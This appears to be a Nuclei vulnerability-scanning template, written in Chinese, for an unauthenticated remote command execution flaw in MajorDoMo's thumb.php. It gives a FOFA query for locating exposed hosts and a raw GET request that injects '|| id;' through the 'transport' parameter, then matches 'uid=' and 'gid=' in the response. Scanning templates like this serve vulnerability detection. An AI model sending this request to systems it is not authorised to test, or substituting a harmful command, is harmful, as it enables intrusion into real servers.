id: MajorDoMo-thumb_php-RCE

info:
  name: 智能家居平台 MajorDoMo thumb.php 远程命令执行漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: title="MajordomoSL"
    智能家居平台 MajorDoMo thumb.php接口存在远程命令执行漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。该漏洞利用难度较低，建议受影响的用户尽快修复。
  reference:
    - https://mp.weixin.qq.com/s/t-FwQhjQ4rBzIErvTMmq6Q
  tags: RCE

http:
  - raw:
      - |
        GET /modules/thumb/thumb.php?url=cnRzcDocm1EMe3&debug=1&transport=%7C%7C+id%3B HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="
          - "gid="
        condition: and
      - type: status
        status: 
          - 200